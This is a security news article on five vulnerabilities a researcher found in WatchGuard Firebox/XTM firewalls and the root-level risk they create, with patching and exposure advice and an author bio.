Ambisonics security engineer Charles Fol published an article last week, where he explains how he discovered 5 vulnerabilities and built 8 exploits to gain root privileges on every WatchGuard Firebox/XTM appliance.
Earlier attacks by Russian-sponsored threat actors
Early this year, WatchGuard firewalls have been under attack multiple times, most notably by the Russian APT Sandworm, abusing a privilege escalation flaw in order to build a botnet called Cyclops Blink that was taken down in April.
Over a four-month period, WatchGuard released three firmware updates, patching a number of critical vulnerabilities.
Complete access to the firewall system as root
Out of the 5 vulnerabilities Charles Fol discovered on the devices, 2 of them were patched by the vendor.
The remaining three are:
- blind Xpath injection, allowing him to retrieve the configuration of a device, including master credentials.
- integer overflow, which allowed an attacker to execute malicious code on remote appliances
- privilege escalation, from a low-privilege user into root
“By combining the two latter, a remote, unauthenticated attacker can get complete access to the firewall system as a super user, or root” said Fol.
“This is the worst possible impact. He or she can now read or change the configuration, intercept traffic, et cetera.
“The first one, in some cases, allows an attacker to obtain the master credentials of the authentication servers, and possibly use this to connect as an administrator on the firewall.”
Devices likely to be exposed
According to Fol, “The first vulnerability – Xpath – is reachable through the standard, client interface, and as such is much more likely to be exposed, a quick shodan search revealed around 350,000 instances.”
He advises users to remove their administration interface from the internet and make sure they keep their systems up to date.
Dimitris is an Information Technology and Cybersecurity professional with more than 20 years of experience in designing, building and maintaining efficient and secure IT infrastructures.
Among others, he is a certified: CISSP, CISA, CISM, ITIL, COBIT and PRINCE2, but his wide set of knowledge and technical management capabilities go beyond these certifications. He likes acquiring new skills on penetration testing, cloud technologies, virtualization, network security, IoT and many more.